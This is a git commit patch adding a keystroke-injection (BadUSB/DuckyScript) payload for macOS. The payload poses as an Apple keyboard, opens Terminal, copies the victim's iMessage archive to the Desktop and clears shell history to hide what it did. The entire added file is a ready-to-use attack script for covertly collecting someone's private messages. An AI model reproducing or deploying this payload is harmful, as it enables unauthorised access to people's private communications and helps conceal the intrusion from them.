From d3682ad058f829c283b8c42157f860d6ecacaa2d Mon Sep 17 00:00:00 2001 From: Narsty <132179825+narstybits@users.noreply.github.com> Date: Tue, 9 May 2023 20:42:32 -0500 Subject: [PATCH] WIll not work if messages are not archived!! Need a workaround but for now its okay. --- Executions/ImessageCapture .txt | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 Executions/ImessageCapture .txt diff --git a/Executions/ImessageCapture .txt b/Executions/ImessageCapture .txt new file mode 100644 index 0000000..bf559ca --- /dev/null +++ b/Executions/ImessageCapture .txt @@ -0,0 +1,31 @@ +REM Author: NARSTY +REM If you haven't previously archived your iMessages, the folder will be empty. +REM This script captures iMessages and puts it into +REM a folder on the desktop named automatically to the users Name +REM MacOS + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 150 +STRING Terminal +DELAY 900 +ENTER +DELAY 900 +STRING cp -r ~/Library/Messages/Archive /Users/$(whoami)/Desktop/ +ENTER +STRING history -c +ENTER +STRING diskutil umount /Volumes/Desktop +ENTER +DELAY 500 +STRING history -c +ENTER +STRING echo 5A13X99 +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 250 +GUI q